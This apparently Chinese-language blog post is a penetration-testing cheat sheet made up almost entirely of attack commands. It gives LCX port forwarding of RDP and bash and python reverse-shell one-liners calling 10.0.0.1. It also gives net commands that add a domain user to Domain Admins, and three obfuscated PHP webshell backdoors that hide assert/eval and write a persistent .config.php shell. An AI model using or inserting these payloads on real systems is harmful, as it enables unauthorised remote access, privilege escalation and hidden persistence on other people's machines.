常用知识二

Author Avatar
Geroge Lee 7月 19, 2017
  • 在其它设备中阅读本文章

常用知识二

0x00 端口转发

1、windows下使用LCX

  • 被控计算机 lcx.exe -slave 本机ip 1234 127.0.0.1 3389
  • 本机 lcx -listen 1234 3389 <!--more-->

2、Linux下使用ssocket

  • 被控计算机
  • 本机

0x01 反弹shell

Linux: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

0x02 net命令

1、映射磁盘到本地

net use D: \dc00\sysvol

2、查看分享

net view \192.168.2.19

3、开启一个共享名为app$,在d:\config

net share app$=d:\config

0x03 添加域管理员账号

1、添加普通域用户

net user lemon iam@L3m0n /add /domain

2、将普通域用户提升为域管理员

net group "Domain Admins" lemon /add /domain

0x04 变形一句话

1、

<?php $a=str_replace(x,"","axsxxsxexrxxt");$a($_POST["LED"]); ?>

请求参数

?LED=fputs(fopen(base64_decode(Jy5jb25maWcucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW0xFRF0pOz8+"))

还原出的命令

assert(fputs(fopen('.config.php',w),"<?php@eval($_POST[LED]);?>"))

利用assert来执行命令,并且用字符串隐藏assert方法,并且利用它加上动态传入参数的方式构造后门

2、

<?php $_GET'a'; ?>

请求参数

?a=assert&b=fputs(fopen(base64_decode(Jy5jb25maWcucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW0xFRF0pOz8+"))

完全利用动态参数传入的方式构造后门,将敏感函数和执行的命令动态传入。

3、

<?php if($_SERVER['REMOTE_ADDR'] == '127.0.0.1'){ $_uU = chr(99).chr(104).chr(114);$_cC = $_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(108).$_uU(101).$_uU(100).$_uU(93).$_uU(41).$_uU(59);$_fF = $_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$uU(110);$=$_fF("",$cC);@$();} ?>

密码:led

限制IP登录

未完待续,持续更新